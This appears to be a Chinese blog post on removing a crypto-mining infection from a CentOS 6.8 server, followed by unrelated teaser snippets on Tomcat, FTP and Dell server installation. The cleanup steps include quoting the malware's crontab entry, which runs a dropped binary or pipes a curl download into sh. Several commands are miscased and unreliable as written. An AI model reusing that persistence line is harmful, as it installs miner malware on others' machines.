centos6 8伺服器中了挖礦程式病毒的解決方法

2021-09-26 20:24:51 字數 637 閱讀 1979

在收到阿里雲的安全警告2條

1、異常登入-ecs在非常用地登入

2、惡意程序(雲查殺)-挖礦程式

根據提示分析,當有異常登入時,基本上是伺服器的密碼被破解了,所以第一步是先修改伺服器的密碼

輸入命令passwd 回車輸入新的密碼

第二步、查封可疑ip,根據阿里雲的提示使用iptabes禁止可疑ip的連線

iptables -i input -s 68.183.140.39 -j drop

檢視一下是否增加進去了

第三步、查殺對應的病毒,大部分的病毒無非通過crontab和常駐記憶體進行複製;所以我們先去查一下crontab

輸入命令crontab -e看一下是否有可疑的命令,我的查詢到如下的命令

*/15 * * * * (/usr/bin/uzmnfa4||/usr/libexec/uzmnfa4||/usr/local/bin/uzmnfa4||/tmp/uzmnfa4||curl -m180 -fssl -q -t180 -o- | sh

阿里雲伺服器CentOS6 8安裝Tomcat

上篇講了centos6.8安裝jdk,這篇來講tomcat的安裝,本來準備使用yum命令安裝的,但是通過 yum search tomcat發現只有tomcat6,所以就在官網下了乙個tomcat8.tar.gz的安裝包 然後把安裝包傳到centos下 usr local目錄下 我是通過filezi...

centos6 8安裝配置ftp伺服器

ftp傳輸原理 客戶端通過某軟體用某個埠 a埠 向服務端發起tcp連線請求,同時告訴服務端客戶端另乙個空閒埠號 b埠 服務端用21埠與客戶端建立一條控制連線通道。接著在預設情況下,服務端使用20埠和b埠建立資料傳送通道。這樣就用客戶端的2個埠和服務端2個埠通道建立了兩條通道,之後就可以傳送資料了。p...

Dell 伺服器CentOS 6 8版本系統安裝

說明 我是從伺服器的管理口進去安裝作業系統的,把6.8版本的光碟事先插在了伺服器的光碟機上,然後進入伺服器管理控制台 伺服器管理ip 的虛擬控制台,然後從下次引導選單下拉中選擇 本地cd 伺服器就會從光碟機啟動 1選擇英文安裝,下一步 2選擇第乙個選項,下一步 3輸入主機名 4時區選擇asia sh...